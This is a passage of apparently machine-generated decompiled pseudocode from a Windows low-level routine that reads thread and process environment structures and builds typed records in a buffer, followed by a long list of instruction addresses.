				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E00A64C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E009DD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E00A65542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0xa860e8;
								if( *0xa860e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0xa860e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E009D9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E009D6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E009DF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E009DF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E009DF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E009DFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E009DFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E009DF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E009DF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E00A64CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E009ED130(_t427, _t494, _t511);
				}
			}










































































                                                                                                                0x00a65ba5
                                                                                                                0x00a65baa
                                                                                                                0x00a65baf
                                                                                                                0x00a65bb4
                                                                                                                0x00a65bb6
                                                                                                                0x00a65bbc
                                                                                                                0x00a65bbe
                                                                                                                0x00a65bc4
                                                                                                                0x00a65bcd
                                                                                                                0x00a65bd3
                                                                                                                0x00a65bd6
                                                                                                                0x00a65bdc
                                                                                                                0x00a65be0
                                                                                                                0x00a65be3
                                                                                                                0x00a65beb
                                                                                                                0x00a65bf2
                                                                                                                0x00a65bf8
                                                                                                                0x00a65bfe
                                                                                                                0x00a65c04
                                                                                                                0x00a65c0e
                                                                                                                0x00a65c18
                                                                                                                0x00a65c1f
                                                                                                                0x00a65c25
                                                                                                                0x00a65c2a
                                                                                                                0x00a65c2c
                                                                                                                0x00a65c32
                                                                                                                0x00a65c3a
                                                                                                                0x00a65c3f
                                                                                                                0x00a65c42
                                                                                                                0x00a65c48
                                                                                                                0x00a65c5b
                                                                                                                0x00a65c5b
                                                                                                                0x00a65c2c
                                                                                                                0x00a65cb7
                                                                                                                0x00a65cb9
                                                                                                                0x00a65cbf
                                                                                                                0x00a65cc2
                                                                                                                0x00a65cca
                                                                                                                0x00a65ccb
                                                                                                                0x00a65ccb
                                                                                                                0x00a65cd1
                                                                                                                0x00a65cd7
                                                                                                                0x00a65cda
                                                                                                                0x00a65ce1
                                                                                                                0x00a65ce4
                                                                                                                0x00a65ce7
                                                                                                                0x00a65ced
                                                                                                                0x00a65cf3
                                                                                                                0x00a65cf9
                                                                                                                0x00a65cff
                                                                                                                0x00a65d08
                                                                                                                0x00a65d0a
                                                                                                                0x00a65d0e
                                                                                                                0x00a65d10
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a65d16
                                                                                                                0x00a65d1a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a65d20
                                                                                                                0x00a65d22
                                                                                                                0x00a65d25
                                                                                                                0x00a65d2f
                                                                                                                0x00a65d2f
                                                                                                                0x00a65d33
                                                                                                                0x00a65d3d
                                                                                                                0x00a65d49
                                                                                                                0x00a65d4b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a65d5a
                                                                                                                0x00a65d5d
                                                                                                                0x00a65d60
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a65d66
                                                                                                                0x00a65d69
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a65d6f
                                                                                                                0x00a65d6f
                                                                                                                0x00a65d73
                                                                                                                0x00a65d79
                                                                                                                0x00a65d7f
                                                                                                                0x00a65d86
                                                                                                                0x00a65d95
                                                                                                                0x00a65d98
                                                                                                                0x00a65dba
                                                                                                                0x00a65dcb
                                                                                                                0x00a65dce
                                                                                                                0x00a65dd3
                                                                                                                0x00a65dd6
                                                                                                                0x00a65dd8
                                                                                                                0x00a65de6
                                                                                                                0x00a65dec
                                                                                                                0x00a65dee
                                                                                                                0x00a65df1
                                                                                                                0x00a65df3
                                                                                                                0x00a6635a
                                                                                                                0x00a6635a
                                                                                                                0x00000000
                                                                                                                0x00a6635a
                                                                                                                0x00a65dfe
                                                                                                                0x00a65e02
                                                                                                                0x00a65e05
                                                                                                                0x00a65e07
                                                                                                                0x00a65e10
                                                                                                                0x00a65e13
                                                                                                                0x00a65e1b
                                                                                                                0x00a65e1c
                                                                                                                0x00a65e21
                                                                                                                0x00a65e22
                                                                                                                0x00a65e23
                                                                                                                0x00a65e25
                                                                                                                0x00a65e2a
                                                                                                                0x00a65e2c
                                                                                                                0x00a65e2e
                                                                                                                0x00a65e36
                                                                                                                0x00a65e39
                                                                                                                0x00a65e42
                                                                                                                0x00a65e47
                                                                                                                0x00a65e4d
                                                                                                                0x00a65e54
                                                                                                                0x00a65e54
                                                                                                                0x00a65e54
                                                                                                                0x00a65e2e
                                                                                                                0x00a65e5c
                                                                                                                0x00a65e5f
                                                                                                                0x00a65e62
                                                                                                                0x00a65e64
                                                                                                                0x00a65e6b
                                                                                                                0x00a65e70
                                                                                                                0x00a65e7a
                                                                                                                0x00a65e7a
                                                                                                                0x00a65e7a
                                                                                                                0x00a65e6b
                                                                                                                0x00a65e7e
                                                                                                                0x00a65e7f
                                                                                                                0x00a65e7f
                                                                                                                0x00a65e81
                                                                                                                0x00a65e87
                                                                                                                0x00a65e8b
                                                                                                                0x00a65e8c
                                                                                                                0x00a65e8c
                                                                                                                0x00a65e8c
                                                                                                                0x00a65e9a
                                                                                                                0x00a65e9c
                                                                                                                0x00a65ea2
                                                                                                                0x00a65ea6
                                                                                                                0x00a65f50
                                                                                                                0x00a65f50
                                                                                                                0x00a65f57
                                                                                                                0x00a65f66
                                                                                                                0x00a65f66
                                                                                                                0x00a65f66
                                                                                                                0x00a65f68
                                                                                                                0x00a65f6a
                                                                                                                0x00a663d0
                                                                                                                0x00000000
                                                                                                                0x00a65f70
                                                                                                                0x00a65f70
                                                                                                                0x00a65f91
                                                                                                                0x00a65f9c
                                                                                                                0x00a65f9e
                                                                                                                0x00a65fa4
                                                                                                                0x00a65fa6
                                                                                                                0x00a6638c
                                                                                                                0x00a66392
                                                                                                                0x00a663a1
                                                                                                                0x00a663a7
                                                                                                                0x00a663af
                                                                                                                0x00a663af
                                                                                                                0x00a663bd
                                                                                                                0x00a663d8
                                                                                                                0x00000000
                                                                                                                0x00a663d8
                                                                                                                0x00a65fac
                                                                                                                0x00a65fb2
                                                                                                                0x00a65fb4
                                                                                                                0x00a65fbd
                                                                                                                0x00a65fc6
                                                                                                                0x00a65fce
                                                                                                                0x00a65fd4
                                                                                                                0x00a65fdc
                                                                                                                0x00a65fec
                                                                                                                0x00a65fed
                                                                                                                0x00a65fee
                                                                                                                0x00a65fef
                                                                                                                0x00a65ff9
                                                                                                                0x00a65ffa
                                                                                                                0x00a65ffb
                                                                                                                0x00a65ffc
                                                                                                                0x00a66000
                                                                                                                0x00a66004
                                                                                                                0x00a66012
                                                                                                                0x00a66012
                                                                                                                0x00a66018
                                                                                                                0x00a66019
                                                                                                                0x00a6601a
                                                                                                                0x00a6601b
                                                                                                                0x00a6601c
                                                                                                                0x00a66020
                                                                                                                0x00a66059
                                                                                                                0x00a6605c
                                                                                                                0x00a66061
                                                                                                                0x00a66061
                                                                                                                0x00a66022
                                                                                                                0x00a66022
                                                                                                                0x00a66022
                                                                                                                0x00a66025
                                                                                                                0x00a6602a
                                                                                                                0x00a6602b
                                                                                                                0x00a66031
                                                                                                                0x00a66037
                                                                                                                0x00a66038
                                                                                                                0x00a6603e
                                                                                                                0x00a66048
                                                                                                                0x00a66049
                                                                                                                0x00a6604a
                                                                                                                0x00a6604b
                                                                                                                0x00a6604c
                                                                                                                0x00a6604d
                                                                                                                0x00a66053
                                                                                                                0x00a66054
                                                                                                                0x00a66054
                                                                                                                0x00a66062
                                                                                                                0x00a66065
                                                                                                                0x00a66067
                                                                                                                0x00a6606a
                                                                                                                0x00a66070
                                                                                                                0x00a66075
                                                                                                                0x00a66076
                                                                                                                0x00a66081
                                                                                                                0x00a66087
                                                                                                                0x00a66095
                                                                                                                0x00a66099
                                                                                                                0x00a6609e
                                                                                                                0x00a660a4
                                                                                                                0x00a660ae
                                                                                                                0x00a660b0
                                                                                                                0x00a660b3
                                                                                                                0x00a660b6
                                                                                                                0x00a660b8
                                                                                                                0x00a660ba
                                                                                                                0x00a660ba
                                                                                                                0x00a660ba
                                                                                                                0x00a660ba
                                                                                                                0x00a660be
                                                                                                                0x00a660c0
                                                                                                                0x00a660c5
                                                                                                                0x00a660c5
                                                                                                                0x00a660c5
                                                                                                                0x00a660c6
                                                                                                                0x00a660cd
                                                                                                                0x00a66114
                                                                                                                0x00a660cf
                                                                                                                0x00a660cf
                                                                                                                0x00a660d4
                                                                                                                0x00a660d5
                                                                                                                0x00a660da
                                                                                                                0x00a660db
                                                                                                                0x00a660e1
                                                                                                                0x00a660e2
                                                                                                                0x00a660e8
                                                                                                                0x00a660f8
                                                                                                                0x00a660fd
                                                                                                                0x00a660fe
                                                                                                                0x00a66102
                                                                                                                0x00a66104
                                                                                                                0x00a66107
                                                                                                                0x00a66109
                                                                                                                0x00a6610b
                                                                                                                0x00a6610b
                                                                                                                0x00a6610b
                                                                                                                0x00a6610b
                                                                                                                0x00a6610f
                                                                                                                0x00a6610f
                                                                                                                0x00a66117
                                                                                                                0x00a6611a
                                                                                                                0x00a6611f
                                                                                                                0x00a66125
                                                                                                                0x00a66134
                                                                                                                0x00a66139
                                                                                                                0x00a6613f
                                                                                                                0x00a66146
                                                                                                                0x00a66148
                                                                                                                0x00a6614b
                                                                                                                0x00a6614d
                                                                                                                0x00a6614f
                                                                                                                0x00a6614f
                                                                                                                0x00a6614f
                                                                                                                0x00a6614f
                                                                                                                0x00a66153
                                                                                                                0x00a66159
                                                                                                                0x00a66159
                                                                                                                0x00a6615c
                                                                                                                0x00a66163
                                                                                                                0x00a66169
                                                                                                                0x00a6616c
                                                                                                                0x00a66172
                                                                                                                0x00a66181
                                                                                                                0x00a66186
                                                                                                                0x00a66187
                                                                                                                0x00a6618b
                                                                                                                0x00a66191
                                                                                                                0x00a66195
                                                                                                                0x00a661a3
                                                                                                                0x00a661bb
                                                                                                                0x00a661c0
                                                                                                                0x00a661c3
                                                                                                                0x00a661cc
                                                                                                                0x00a661d0
                                                                                                                0x00a661dc
                                                                                                                0x00a661de
                                                                                                                0x00a661e1
                                                                                                                0x00a661e4
                                                                                                                0x00a661e6
                                                                                                                0x00a661e8
                                                                                                                0x00a661e8
                                                                                                                0x00a661e8
                                                                                                                0x00a661e8
                                                                                                                0x00a661e6
                                                                                                                0x00a661ec
                                                                                                                0x00a661f3
                                                                                                                0x00a66203
                                                                                                                0x00a66209
                                                                                                                0x00a6620a
                                                                                                                0x00a66216
                                                                                                                0x00a6621d
                                                                                                                0x00a66227
                                                                                                                0x00a66241
                                                                                                                0x00a66246
                                                                                                                0x00a6624c
                                                                                                                0x00a66257
                                                                                                                0x00a66259
                                                                                                                0x00a6625c
                                                                                                                0x00a6625e
                                                                                                                0x00a66260
                                                                                                                0x00a66260
                                                                                                                0x00a66260
                                                                                                                0x00a66260
                                                                                                                0x00a6625e
                                                                                                                0x00a66264
                                                                                                                0x00a66267
                                                                                                                0x00a66269
                                                                                                                0x00a66315
                                                                                                                0x00a66315
                                                                                                                0x00a6631b
                                                                                                                0x00a6631e
                                                                                                                0x00a66324
                                                                                                                0x00a66327
                                                                                                                0x00a6632f
                                                                                                                0x00a66330
                                                                                                                0x00a66333
                                                                                                                0x00a6633a
                                                                                                                0x00a6633c
                                                                                                                0x00a66335
                                                                                                                0x00a66335
                                                                                                                0x00a66335
                                                                                                                0x00a6633f
                                                                                                                0x00a66342
                                                                                                                0x00a6634c
                                                                                                                0x00a66352
                                                                                                                0x00a66355
                                                                                                                0x00a66355
                                                                                                                0x00a66359
                                                                                                                0x00000000
                                                                                                                0x00a6626f
                                                                                                                0x00a66275
                                                                                                                0x00a66275
                                                                                                                0x00a66278
                                                                                                                0x00a6627e
                                                                                                                0x00a6627e
                                                                                                                0x00a66281
                                                                                                                0x00a66287
                                                                                                                0x00a6628d
                                                                                                                0x00a66298
                                                                                                                0x00a6629c
                                                                                                                0x00a662a2
                                                                                                                0x00a6629e
                                                                                                                0x00a6629e
                                                                                                                0x00a6629e
                                                                                                                0x00a662a7
                                                                                                                0x00a662a7
                                                                                                                0x00a662aa
                                                                                                                0x00a662b0
                                                                                                                0x00a662f0
                                                                                                                0x00a662f0
                                                                                                                0x00a662f2
                                                                                                                0x00a662f8
                                                                                                                0x00a662fd
                                                                                                                0x00a662b2
                                                                                                                0x00a662b2
                                                                                                                0x00a662b2
                                                                                                                0x00a662b5
                                                                                                                0x00a662dd
                                                                                                                0x00a662e2
                                                                                                                0x00a662e5
                                                                                                                0x00a662b7
                                                                                                                0x00a662b8
                                                                                                                0x00a662bb
                                                                                                                0x00a662bd
                                                                                                                0x00a662c0
                                                                                                                0x00a662c4
                                                                                                                0x00a662cd
                                                                                                                0x00a662cd
                                                                                                                0x00a662c0
                                                                                                                0x00a662bb
                                                                                                                0x00a662b5
                                                                                                                0x00a66302
                                                                                                                0x00a66303
                                                                                                                0x00a66305
                                                                                                                0x00a66305
                                                                                                                0x00a66305
                                                                                                                0x00a6630c
                                                                                                                0x00a6630c
                                                                                                                0x00000000
                                                                                                                0x00a6627e
